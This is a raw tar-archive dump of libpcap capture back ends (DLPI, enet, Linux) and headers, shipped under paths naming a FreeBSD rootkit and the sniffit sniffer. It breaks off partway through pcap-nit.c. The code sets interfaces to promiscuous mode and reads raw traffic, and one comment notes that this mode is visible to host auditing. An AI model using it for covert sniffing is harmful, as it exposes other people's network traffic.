Packet capture routine for dlpi under SunOS 5 * * Notes: * * - Apparently the DLIOCRAW ioctl() is specific to SunOS. * * - There is a bug in bufmod(7) such that setting the snapshot * length results in data being left of the front of the packet. * * - It might be desirable to use pfmod(7) to filter packets in the * kernel. 
*/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" #define MAXDLBUF 8192 /* Forwards */ static int send_request(int, char *, int, char *, char *); static int dlattachreq(int, u_long, char *); static int dlinfoack(int, char *, char *); static int dlinforeq(int, char *); static int dlpromisconreq(int, u_long, char *); static int dlokack(int, char *, char *); static int strioctl(int, int, int, char *); #ifdef SOLARIS static char *getrelease(long *, long *, long *); #endif int pcap_stats(pcap_t *p, struct pcap_stat *ps) { *ps = p->md.stat; return (0); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc, n; register u_char *bp, *ep, *pk; register struct bpf_insn *fcode; register struct sb_hdr *sbp; int flags; struct strbuf data; struct pcap_pkthdr pkthdr; flags = 0; cc = p->cc; if (cc == 0) { data.buf = (char *)p->buffer; data.maxlen = MAXDLBUF; data.len = 0; do { if (getmsg(p->fd, NULL, &data, &flags) < 0) { /* Don't choke when we get ptraced */ if (errno == EINTR) { cc = 0; continue; } strcpy(p->errbuf, pcap_strerror(errno)); return (-1); } cc = data.len; } while (cc == 0); bp = p->buffer; } else bp = p->bp; /* Loop through packets */ fcode = p->fcode.bf_insns; ep = bp + cc; n = 0; while (bp < ep) { sbp = (struct sb_hdr *)bp; p->md.stat.ps_drop += sbp->sbh_drops; ++p->md.stat.ps_recv; pk = bp + sizeof(*sbp); bp += sbp->sbh_totlen; if (bpf_filter(fcode, pk, sbp->sbh_origlen, sbp->sbh_msglen)) { pkthdr.ts = sbp->sbh_timestamp; pkthdr.len = sbp->sbh_origlen; pkthdr.caplen = sbp->sbh_msglen; /* Insure caplen does not exceed snapshot */ if (pkthdr.caplen > p->snapshot) pkthdr.caplen = p->snapshot; (*callback)(user, &pkthdr, pk); if (++n >= cnt && cnt >= 0) { p->cc = ep - bp; p->bp = bp; return (n); } } } p->cc = 0; return (n); } pcap_t * pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char 
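*ebuf)
{
	/*
	 * Open a DLPI network device for live capture (SunOS 5 back end).
	 *
	 * `device' is a name such as "le0" or "/dev/le0": the trailing digit
	 * is taken as the PPA to attach to and the remainder names the device
	 * node that is opened.  On failure a message is written to `ebuf' and
	 * control transfers to the `bad' label further down in this function.
	 *
	 * NOTE(review): `ebuf' is written with unbounded sprintf()/strcpy();
	 * its size is not visible here, so callers must supply a buffer large
	 * enough for the longest message -- confirm against the public header.
	 */
	register pcap_t *p;
	long buf[MAXDLBUF];
	int ppa;
	int cppa;
	register dl_info_ack_t *infop;
	u_long ss, flag;
#ifdef SOLARIS
	char *release;
	long osmajor, osminor, osmicro;
#endif
	char dname[100];
	size_t devlen;
	int n;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		strcpy(ebuf, pcap_strerror(errno));
		return (NULL);
	}
	memset(p, 0, sizeof(*p));

	/*
	** 1) In order to get the ppa take the last character of the device
	** name; if it is not a digit then fail the open.
	**
	** 2) If the name starts with a '/' then this is an absolute pathname,
	** otherwise prepend '/dev/'.
	**
	** 3) Remove the trailing digit and try and open the device
	** not staggeringly intuitive but it should work.
	**
	** If there are more than 9 devices this code will fail.
	*/

	/*
	 * The device name is caller-supplied.  An empty string would index
	 * device[-1], and a long one would overrun the fixed-size dname[]
	 * through strcpy()/strcat(), so both are rejected up front.
	 */
	devlen = strlen(device);
	if (devlen == 0) {
		sprintf(ebuf, "empty device name");
		goto bad;
	}
	if (devlen >= sizeof(dname)) {
		sprintf(ebuf, "device name too long");
		goto bad;
	}

	/* <ctype.h> classifiers require a value representable as unsigned char */
	cppa = (unsigned char)device[devlen - 1];
	if (!isdigit(cppa)) {
		sprintf(ebuf, "%c is not a digit, therefore not a valid ppa", cppa);
		goto bad;
	}

	/* Build "[/dev/]<device minus trailing digit>" with an explicit bound. */
	n = snprintf(dname, sizeof(dname), "%s%.*s",
	    device[0] != '/' ? "/dev/" : "", (int)(devlen - 1), device);
	if (n < 0 || (size_t)n >= sizeof(dname)) {
		sprintf(ebuf, "device name too long");
		goto bad;
	}

	if ((p->fd = open(dname, O_RDWR)) < 0) {
		sprintf(ebuf, "%s: %s", dname, pcap_strerror(errno));
		goto bad;
	}
	/*
	 * NOTE(review): from here on every `goto bad' leaves p->fd open; the
	 * `bad' label in this function only frees p.  The descriptor should be
	 * closed there, with p->fd preset to -1 so an early failure does not
	 * close descriptor 0.
	 */
	p->snapshot = snaplen;

	ppa = cppa - '0';
	/*
	** Attach.
	*/
	if (dlattachreq(p->fd, ppa, ebuf) < 0 ||
	    dlokack(p->fd, (char *)buf, ebuf) < 0)
		goto bad;

	if (promisc) {
		/*
		** enable promiscuous.
		*/
		if (dlpromisconreq(p->fd, DL_PROMISC_PHYS, ebuf) < 0 ||
		    dlokack(p->fd, (char *)buf, ebuf) < 0)
			goto bad;
		if (dlpromisconreq(p->fd, DL_PROMISC_SAP, ebuf) < 0 ||
		    dlokack(p->fd, (char *)buf, ebuf) < 0)
			goto bad;

		/*
		** enable multicast, you would have thought promiscuous
		** would be sufficient.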
*/ if (dlpromisconreq(p->fd, DL_PROMISC_MULTI, ebuf) < 0 || dlokack(p->fd, (char *)buf, ebuf) < 0) goto bad; } /* ** Determine link type */ if (dlinforeq(p->fd, ebuf) < 0 || dlinfoack(p->fd, (char *)buf, ebuf) < 0) goto bad; infop = &((union DL_primitives *)buf)->info_ack; switch (infop->dl_mac_type) { case DL_ETHER: p->linktype = DLT_EN10MB; break; case DL_FDDI: p->linktype = DLT_FDDI; break; default: sprintf(ebuf, "unknown mac type 0x%lu", infop->dl_mac_type); goto bad; } #ifdef DLIOCRAW /* ** This is a non standard SunOS hack to get the ethernet header. */ if (strioctl(p->fd, DLIOCRAW, 0, NULL) < 0) { sprintf(ebuf, "DLIOCRAW: %s", pcap_strerror(errno)); goto bad; } #endif /* ** Another non standard call to get the data nicely buffered */ if (ioctl(p->fd, I_PUSH, "bufmod") != 0) { sprintf(ebuf, "I_PUSH bufmod: %s", pcap_strerror(errno)); goto bad; } /* ** Now that the bufmod is pushed lets configure it. ** ** There is a bug in bufmod(7). When dealing with messages of ** less than snaplen size it strips data from the beginning not ** the end. ** ** This bug is supposed to be fixed in 5.3.2. Also, there is a ** patch available. Ask for bugid 1149065. 
*/ ss = snaplen; #ifdef SOLARIS release = getrelease(&osmajor, &osminor, &osmicro); if (osmajor == 5 && (osminor <= 2 || (osminor == 3 && osmicro < 2)) && getenv("BUFMOD_FIXED") == NULL) { fprintf(stderr, "WARNING: bufmod is broken in SunOS %s; ignoring snaplen.\n", release); ss = 0; } #endif if (ss > 0 && strioctl(p->fd, SBIOCSSNAP, sizeof(u_long), (char *)&ss) != 0) { sprintf(ebuf, "SBIOCSSNAP: %s", pcap_strerror(errno)); goto bad; } /* ** Set up the bufmod flags */ if (strioctl(p->fd, SBIOCGFLAGS, sizeof(u_long), (char *)&flag) < 0) { sprintf(ebuf, "SBIOCGFLAGS: %s", pcap_strerror(errno)); goto bad; } flag |= SB_NO_DROPS; if (strioctl(p->fd, SBIOCSFLAGS, sizeof(u_long), (char *)&flag) != 0) { sprintf(ebuf, "SBIOCSFLAGS: %s", pcap_strerror(errno)); goto bad; } /* ** Set up the bufmod timeout */ if (to_ms != 0) { struct timeval to; to.tv_sec = to_ms / 1000; to.tv_usec = (to_ms * 1000) % 1000000; if (strioctl(p->fd, SBIOCSTIME, sizeof(to), (char *)&to) != 0) { sprintf(ebuf, "SBIOCSTIME: %s", pcap_strerror(errno)); goto bad; } } /* ** As the last operation flush the read side. 
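	*/
	if (ioctl(p->fd, I_FLUSH, FLUSHR) != 0) {
		sprintf(ebuf, "FLUSHR: %s", pcap_strerror(errno));
		goto bad;
	}

	/* Allocate data buffer */
	p->bufsize = MAXDLBUF * sizeof(long);
	p->buffer = (u_char *)malloc(p->bufsize);
	if (p->buffer == NULL) {
		/*
		 * pcap_read() hands p->buffer straight to getmsg(); returning
		 * a handle with a NULL buffer would defer the failure to the
		 * first read instead of reporting it here.
		 */
		strcpy(ebuf, pcap_strerror(errno));
		goto bad;
	}

	return (p);
bad:
	/*
	 * NOTE(review): only the handle is released; a descriptor stored in
	 * p->fd by the earlier open() is not closed on this path.
	 */
	free(p);
	return (NULL);
}

/*
 * Install a filter program.  This back end filters in user space, so the
 * program is only copied into the handle.  Always returns 0.
 */
int
pcap_setfilter(pcap_t *p, struct bpf_program *fp)
{

	p->fcode = *fp;
	return (0);
}

/*
 * Send `len' bytes at `ptr' as the control part of a STREAMS message on
 * `fd' (no data part).  `what' names the request in the error text.
 * Returns 0 on success, -1 with a message in `ebuf' when putmsg() fails.
 */
static int
send_request(int fd, char *ptr, int len, char *what, char *ebuf)
{
	struct strbuf ctl;
	int flags;

	ctl.maxlen = 0;
	ctl.len = len;
	ctl.buf = ptr;

	flags = 0;

	if (putmsg(fd, &ctl, (struct strbuf *) NULL, flags) < 0) {
		sprintf(ebuf, "putmsg \"%s\"failed: %s",
		    what, pcap_strerror(errno));
		return (-1);
	}
	return (0);
}

/*
 * Issue DL_ATTACH_REQ for unit `ppa'.  Returns send_request()'s result.
 */
static int
dlattachreq(int fd, u_long ppa, char *ebuf)
{
	dl_attach_req_t req;

	req.dl_primitive = DL_ATTACH_REQ;
	req.dl_ppa = ppa;

	return (send_request(fd, (char *)&req, sizeof(req), "attach", ebuf));
}

/*
 * Issue DL_PROMISCON_REQ at the given promiscuity `level'.  Returns
 * send_request()'s result.
 */
static int
dlpromisconreq(int fd, u_long level, char *ebuf)
{
	dl_promiscon_req_t req;

	req.dl_primitive = DL_PROMISCON_REQ;
	req.dl_level = level;

	return (send_request(fd, (char *)&req, sizeof(req), "promiscon", ebuf));
}

/*
 * Read one control message into `bufp' and require it to be a DL_OK_ACK
 * of exactly sizeof(dl_ok_ack_t) bytes.  Returns 0 on success, -1 with a
 * message in `ebuf' otherwise.  `bufp' must hold at least MAXDLBUF bytes.
 */
static int
dlokack(int fd, char *bufp, char *ebuf)
{
	union DL_primitives *dlp;
	struct strbuf ctl;
	int flags;

	ctl.maxlen = MAXDLBUF;
	ctl.len = 0;
	ctl.buf = bufp;

	flags = 0;
	if (getmsg(fd, &ctl, (struct strbuf*)NULL, &flags) < 0) {
		sprintf(ebuf, "getmsg: %s", pcap_strerror(errno));
		return (-1);
	}

	/*
	 * NOTE(review): the primitive is read before ctl.len is checked, so
	 * a short reply is classified from whatever the buffer already held.
	 */
	dlp = (union DL_primitives *) ctl.buf;

	if (dlp->dl_primitive != DL_OK_ACK) {
		sprintf(ebuf, "dlokack unexpected primitive %d",
		    dlp->dl_primitive);
		return (-1);
	}

	if (ctl.len != sizeof(dl_ok_ack_t)) {
		sprintf(ebuf, "dlokack incorrect size returned");
		return (-1);
	}
	return (0);
}

/*
 * Issue DL_INFO_REQ.  Returns send_request()'s result.
 */
static int
dlinforeq(int fd, char *ebuf)
{
	dl_info_req_t req;

	req.dl_primitive = DL_INFO_REQ;

	return (send_request(fd, (char *)&req, sizeof(req), "info", ebuf));
}

static int
dlinfoack(int fd, char *bufp, char *ebuf)
{
	union DL_primitives *dlp;
	struct strbuf ctl;
	int flags;

	ctl.maxlen = MAXDLBUF;
	ctl.len = 0;
	ctl.buf = bufp;

	flags =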
0; if (getmsg(fd, &ctl, (struct strbuf *)NULL, &flags) < 0) { sprintf(ebuf, "dlinfoack: getmsg: %s", pcap_strerror(errno)); return (-1); } dlp = (union DL_primitives *) ctl.buf; if (dlp->dl_primitive != DL_INFO_ACK) { sprintf(ebuf, "dlinfoack: unexpected primitive %ld", dlp->dl_primitive); return (-1); } /* Extra stuff like the broadcast address can be returned */ if (ctl.len < DL_INFO_ACK_SIZE) { sprintf(ebuf, "dlinfoack: incorrect size returned"); return (-1); } return (0); } static int strioctl(int fd, int cmd, int len, char *dp) { struct strioctl str; int rc; str.ic_cmd = cmd; str.ic_timout = -1; str.ic_len = len; str.ic_dp = dp; rc = ioctl(fd, I_STR, &str); if (rc < 0) return (rc); else return (str.ic_len); } #ifdef SOLARIS static char * getrelease(long *majorp, long *minorp, long *microp) { char *cp; static char buf[32]; *majorp = 0; *minorp = 0; *microp = 0; if (sysinfo(SI_RELEASE, buf, sizeof(buf)) < 0) return ("?"); cp = buf; if (!isdigit(*cp)) return (buf); *majorp = strtol(cp, &cp, 10); if (*cp++ != '.') return (buf); *minorp = strtol(cp, &cp, 10); if (*cp++ != '.') return (buf); *microp = strtol(cp, &cp, 10); return (buf); } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-enet.c100400 764 764 11307 6226213211 16702 0ustar dfdf/* * Stanford Enetfilter subroutines for tcpdump * * Based on the MERIT NNstat etherifrt.c and the Ultrix pcap-pf.c * subroutines. 
* * Rayan Zachariassen, CA*Net */ #include #include #include #include #include #include #include #include #include #include #include #include #include "interface.h" struct packet_header { #ifdef IBMRTPC struct LengthWords length; struct tap_header tap; #endif /* IBMRTPC */ u_char packet[8] }; extern int errno; #define BUFSPACE (4*1024) /* Forwards */ static void efReadError(int, char *); void readloop(int cnt, int if_fd, struct bpf_program *fp, printfunc printit) { #ifdef IBMRTPC register struct packet_header *ph; register u_char *bp; register int inc; #else /* !IBMRTPC */ static struct timeval tv = { 0 }; #endif /* IBMRTPC */ register int cc, caplen; register struct bpf_insn *fcode = fp->bf_insns; union { struct packet_header hdr; u_char p[BUFSPACE]; u_short s; } buf; while (1) { if ((cc = read(if_fd, (char *)buf.p, sizeof(buf))) < 0) efReadError(if_fd, "reader"); #ifdef IBMRTPC /* * Loop through each packet. */ bp = buf.p; while (cc > 0) { ph = (struct packet_header *)bp; caplen = ph->tap.th_wirelen > snaplen ? snaplen : ph->tap .th_wirelen ; if (bpf_filter(fcode, (char *)ph->packet, ph->tap.th_wirelen, caplen)) { if (cnt >= 0 && --cnt < 0) goto out; (*printit)((char *)ph->packet, (struct timeval *)ph->tap.th_timestamp, ph->tap.th_wirelen, caplen); } inc = ph->length.PacketOffset; cc -= inc; bp += inc; } #else /* !IBMRTPC */ caplen = cc > snaplen ? snaplen : cc ; if (bpf_filter(fcode, buf.hdr.packet, cc, caplen)) { if (cnt >= 0 && --cnt < 0) goto out; (*printit)(buf.hdr.packet, &tv, cc, caplen); } #endif /* IBMRTPC */ } out: wrapup(if_fd); } /* Call ONLY if read() has returned an error on packet filter */ static void efReadError(int fid, char *msg) { if (errno == EINVAL) { /* read MAXINT bytes already! 
*/ if (lseek(fid, 0, 0) < 0) { perror("tcpdump: efReadError/lseek"); exit(-1); } else return; } else { (void) fprintf(stderr, "tcpdump: "); perror(msg); exit(-1); } } void wrapup(int fd) { #ifdef IBMRTPC struct enstats es; if (ioctl(fd, EIOSTATS, &es) == -1) { perror("tcpdump: enet ioctl EIOSTATS error"); exit(-1); } fprintf(stderr, "%d packets queued", es.enStat_Rcnt); if (es.enStat_Rdrops > 0) fprintf(stderr, ", %d dropped", es.enStat_Rdrops); if (es.enStat_Reads > 0) fprintf(stderr, ", %d tcpdump %s", es.enStat_Reads, es.enStat_Reads > 1 ? "reads" : "read"); if (es.enStat_MaxRead > 1) fprintf(stderr, ", %d packets in largest read", es.enStat_MaxRead); putc('\n', stderr); #endif /* IBMRTPC */ close(fd); } int initdevice(char *device, int pflag, int *linktype) { struct eniocb ctl; struct enfilter filter; u_int maxwaiting; int if_fd; #ifdef IBMRTPC GETENETDEVICE(0, O_RDONLY, &if_fd); #else /* !IBMRTPC */ if_fd = open("/dev/enet", O_RDONLY, 0); #endif /* IBMRTPC */ if (if_fd == -1) { perror("tcpdump: enet open error"); error( "your system may not be properly configured; see \"man enet(4)\""); exit(-1); } /* Get operating parameters. */ if (ioctl(if_fd, EIOCGETP, (char *)&ctl) == -1) { perror("tcpdump: enet ioctl EIOCGETP error"); exit(-1); } /* Set operating parameters. */ #ifdef IBMRTPC ctl.en_rtout = 1 * ctl.en_hz; ctl.en_tr_etherhead = 1; ctl.en_tap_network = 1; ctl.en_multi_packet = 1; ctl.en_maxlen = BUFSPACE; #else /* !IBMRTPC */ ctl.en_rtout = 64; /* randomly picked value for HZ */ #endif /* IBMRTPC */ if (ioctl(if_fd, EIOCSETP, &ctl) == -1) { perror("tcpdump: enet ioctl EIOCSETP error"); exit(-1); } /* Flush the receive queue, since we've changed the operating parameters and we otherwise might receive data without headers. */ if (ioctl(if_fd, EIOCFLUSH) == -1) { perror("tcpdump: enet ioctl EIOCFLUSH error"); exit(-1); } /* Set the receive queue depth to its maximum. 
*/ maxwaiting = ctl.en_maxwaiting; if (ioctl(if_fd, EIOCSETW, &maxwaiting) == -1) { perror("tcpdump: enet ioctl EIOCSETW error"); exit(-1); } #ifdef IBMRTPC /* Clear statistics. */ if (ioctl(if_fd, EIOCLRSTAT, 0) == -1) { perror("tcpdump: enet ioctl EIOCLRSTAT error"); exit(-1); } #endif /* IBMRTPC */ /* Set the filter (accept all packets). */ filter.enf_Priority = 3; filter.enf_FilterLen = 0; if (ioctl(if_fd, EIOCSETF, &filter) == -1) { perror("tcpdump: enet ioctl EIOCSETF error"); exit(-1); } /* * "enetfilter" supports only ethernets. */ *linktype = DLT_EN10MB; return(if_fd); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-int.h100400 764 764 5650 6226213211 16532 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap-int.h,v 1.7 94/06/14 20:03:33 leres Exp $ (LBL) */ #ifndef pcap_int_h #define pcap_int_h #include /* * Savefile */ struct pcap_sf { FILE *rfile; int swapped; int version_major; int version_minor; u_char *base; }; struct pcap_md { struct pcap_stat stat; #ifdef PCAP_PF int use_bpf; u_long TotPkts; /* can't oflow for 79 hrs on ether */ u_long TotAccepted; /* count accepted by filter */ u_long TotDrops; /* count of dropped packets */ long TotMissed; /* missed by i/f during this run */ long OrigMissed; /* missed by i/f before this run */ #endif }; struct pcap { int fd; int snapshot; int linktype; int tzoff; /* timezone offset */ struct pcap_sf sf; struct pcap_md md; /* * Read buffer. */ int bufsize; u_char *buffer; u_char *bp; int cc; /* * Place holder for pcap_next(). */ u_char *pkt; /* * Placeholder for filter code if bpf not in kernel. */ struct bpf_program fcode; char errbuf[PCAP_ERRBUF_SIZE]; }; /* XXX should these be in pcap.h? 
*/ int pcap_offline_read(pcap_t *, int, pcap_handler, u_char *); int pcap_read(pcap_t *, int cnt, pcap_handler, u_char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-linux.c100600 764 764 10520 6226213211 17104 0ustar dfdf/* * Linux interface for packet capture lib * ported by Adam Caldwell (acaldwel@ace.cs.ohiou.edu) * Based on the pcap-snoop.c file * May be freely redistributed as per the GNU license */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcap-int.h" static char snoop_device[255]; struct ifreq ifr_orig; void restore_interface() { int fd; fd = socket(PF_INET, SOCK_PACKET, htons(0x0003)); if (fd < 0) { printf("Warning: could not restore interface to normal.\n"); return; } if (ioctl(fd, SIOCSIFFLAGS, &ifr_orig)<0) printf("Warning: could not restore interface to normal.\n"); } int pcap_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int datalen; register int caplen; struct sockaddr from; int from_len; char *buf; int bufsize; if (p->linktype == DLT_SLIP) { buf = (char *)p->buffer+16; bufsize = p->bufsize - 16; memset(p->buffer,0,16); } else if (p->linktype == DLT_PPP) { buf = (char *)p->buffer+4; bufsize = p->bufsize - 4; memset(p->buffer,0,4); } else { buf = (char *)p->buffer; bufsize = p->bufsize; } do { from_len = sizeof(from); datalen = recvfrom(p->fd,buf,bufsize,0,&from,&from_len); if (datalen < 0) { switch (errno) { case EWOULDBLOCK: return (0); } sprintf(p->errbuf, "read: %s", pcap_strerror(errno)); return (-1); } } while (strcmp(snoop_device,from.sa_data)); /* go until we find something from the right interface */ if (p->linktype == DLT_SLIP) datalen+=16; else if (p->linktype == DLT_PPP) datalen+=4; caplen = (datalen > p->bufsize) ? 
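p->bufsize : datalen;
	/*
	 * The captured length is the smaller of what was received and the
	 * buffer size.  The original picked the larger of the two, so caplen
	 * advertised bytes that recvfrom() never wrote and the callback was
	 * handed stale buffer contents as packet data.
	 */
	if (caplen > p->snapshot)
		caplen = p->snapshot;

	if (p->fcode.bf_insns == NULL ||
	    bpf_filter(p->fcode.bf_insns, (char *)p->buffer, datalen, caplen)) {
		struct pcap_pkthdr h;

		++p->md.stat.ps_recv;
#ifdef SIOCGSTAMP
		if (ioctl(p->fd,SIOCGSTAMP,&h.ts)<0)  /* ask for the timestamp */
#endif
			gettimeofday(&h.ts,0);
		h.len = datalen;
		h.caplen = caplen;
		(*callback)(user, &h, (char *)p->buffer);
		return (1);
	}
	return (0);
}

/*
 * Report capture statistics.  Only packets accepted by the filter are
 * counted in ps_recv; both drop counters are always reported as zero.
 * Always returns 0.
 */
int
pcap_stats(pcap_t *p, struct pcap_stat *ps)
{

	ps->ps_drop = 0;
	ps->ps_recv = p->md.stat.ps_recv;
	ps->ps_ifdrop = 0;
	return (0);
}

/*
 * Open `device' for live capture through a SOCK_PACKET socket.
 *
 * The link type is guessed from the first two characters of the name
 * ("et", "sl", "pp").  When `promisc' is set on a non-SLIP/PPP device the
 * interface flags are saved in ifr_orig, IFF_PROMISC is set, and
 * restore_interface() is registered with atexit().  `to_ms' is not used by
 * this back end.  Returns the new handle, or 0 with a message in `ebuf'.
 */
pcap_t *
pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf)
{
	pcap_t *p;
	struct ifreq ifr;

	p = (pcap_t *)malloc(sizeof(*p));
	if (p == NULL) {
		strcpy(ebuf, "no swap");
		return (0);
	}

	bzero(p, sizeof(*p));
	/*
	 * Mark the descriptor invalid before anything can fail: the cleanup
	 * path closes any p->fd >= 0, and the zero left by bzero() would make
	 * an early failure close descriptor 0 of the calling process.
	 */
	p->fd = -1;

	/*
	 * The name is later copied into the fixed-size snoop_device[] (and
	 * into ifr.ifr_name when promiscuous mode is requested); reject
	 * anything that would not fit instead of overrunning them.
	 */
	if (strlen(device) >= sizeof(snoop_device)) {
		sprintf(ebuf, "snoop: device name too long");
		goto bad;
	}

	if (strncmp("et", device, 2) == 0)
		p->linktype = DLT_EN10MB;
	else if (strncmp("sl", device, 2) == 0)
		p->linktype = DLT_SLIP;
	else if (strncmp("pp", device, 2) == 0)
		p->linktype = DLT_PPP;
	else {
		sprintf(ebuf, "snoop: unknown physical layer type");
		goto bad;
	}

	p->bufsize = 4096;
	p->buffer = (u_char *)malloc(p->bufsize);
	if (p->buffer == NULL) {
		strcpy(ebuf, "no swap");
		goto bad;
	}

	p->fd = socket(PF_INET, SOCK_PACKET, htons(0x0003));
	if (p->fd < 0) {
		sprintf(ebuf, "snoop socket: %s", pcap_strerror(errno));
		goto bad;
	}

	if (p->linktype != DLT_SLIP && p->linktype != DLT_PPP && promisc) {
		if (strlen(device) >= sizeof(ifr.ifr_name)) {
			sprintf(ebuf, "snoop: device name too long");
			goto bad;
		}
		strcpy(ifr.ifr_name, device);  /* interface we're gonna use */
		if (ioctl(p->fd, SIOCGIFFLAGS, &ifr) < 0 ) {  /* get flags */
			sprintf(ebuf, "socket ioctl get: %s",
			    pcap_strerror(errno));
			goto bad;
		}
		ifr_orig = ifr;
		atexit(restore_interface);
		/*
		 * IFF_PROMISC is interface state, not process state: it stays
		 * readable through SIOCGIFFLAGS by anything auditing the host
		 * and persists until the flags are written back.
		 */
		ifr.ifr_flags |= IFF_PROMISC;  /* set promiscuous mode */
		if (ioctl(p->fd, SIOCSIFFLAGS, &ifr) < 0 ) {  /* set flags */
			sprintf(ebuf, "socket ioctl set: %s",
			    pcap_strerror(errno));
			goto bad;
		}
	}

	/* Length was checked against sizeof(snoop_device) above. */
	strcpy(snoop_device,device);
	p->snapshot = snaplen;

	return (p);
bad:
	if (p->fd >= 0)
		close(p->fd);
	if (p->buffer != NULL)
		free(p->buffer);
	free(p);
	return (0);
}

int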
pcap_setfilter(pcap_t *p, struct bpf_program *fp) { p->fcode = *fp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-namedb.h100400 764 764 6060 6226213211 17162 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#) $Header: pcap-namedb.h,v 1.2 94/06/14 20:03:34 leres Exp $ (LBL) */ #ifndef lib_pcap_ethers_h #define lib_pcap_ethers_h /* * As returned by the pcap_next_etherent() * XXX this stuff doesn't belong in this inteface, but this * library already must do name to address translation, so * on systems that don't have support for /etc/ethers, we * export these hooks since they'll */ struct pcap_etherent { u_char addr[6]; char name[122]; }; #ifndef PCAP_ETHERS_FILE #define PCAP_ETHERS_FILE "/etc/ethers" #endif struct pcap_etherent *pcap_next_etherent(FILE *); u_char *pcap_ether_hostton(const char*); u_char *pcap_ether_aton(const char *); u_long **pcap_nametoaddr(const char *); u_long pcap_nametonetaddr(const char *); int pcap_nametoport(const char *, int *, int *); int pcap_nametoproto(const char *); int pcap_nametoeproto(const char *); /* * If a protocol is unknown, PROTO_UNDEF is returned. * Also, pcap_nametoport() returns the protocol along with the port number. * If there are ambiguous entried in /etc/services (i.e. domain * can be either tcp or udp) PROTO_UNDEF is returned. */ #define PROTO_UNDEF -1 /* XXX move these to pcap-int.h? */ u_long __pcap_atodn(const char *); u_long __pcap_atoin(const char *); u_short __pcap_nametodnaddr(const char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap-nit.c100400 764 764 12715 6226213211 16545 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: pcap-nit.c,v 1.24 94/02/10 23:02:37 leres 